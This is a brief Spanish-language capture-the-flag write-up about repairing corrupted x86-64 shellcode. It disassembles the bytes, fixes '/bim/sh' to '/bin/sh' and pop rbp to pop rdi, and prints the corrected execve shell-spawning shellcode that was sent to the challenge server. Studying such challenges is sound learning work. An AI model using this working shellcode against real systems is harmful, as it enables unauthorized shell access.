
El reto proporcionaba un shellcode corrupto que se tenia que arreglar a nivel de opcodes para poder ser ejecutado correctamente:

50 48 31 d2 48 31 f6 48 bb 2f 62 69 6d 2f 2f 73 68 53 54 5d b0 3b 0f 05

Al cargar este shellcode en un online dissassembler como: https://onlinedisassembler.com/odaweb/

Obtendriamos:

50 					;push rax
48 31 d2 				;xor rdx, rdx
48 31 f6 				;xor rsi, rsi
48 bb 2f 62 69 6d 2f 2f 73 68 		;movabs rbx, 0x68732f2f6d69622f  ----> /bim/sh  <---- 6d=m -> Debe ser 6e=n -> /bin/sh
53 					;push rbx
54 					;push rsp
5d 					;pop rbp      -> En x64 architecture, el primer parametro se pasa en el registro rdi no en rbp, por lo que habia q cambiar el 5d por 5f = pop rdi
b0 3b 					;mov al, 0x3b
0f 05					;syscall


Finalmente el nuevo shellcode corregido se enviaba al servidor para la flag (ver solve.py):

 50 48 31 d2 48 31 f6 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f b0 3b 0f 05


NOTA, Tambien se otorgo exec_shellcode para poder debuggearlo localmente y darse cuenta de la falla:


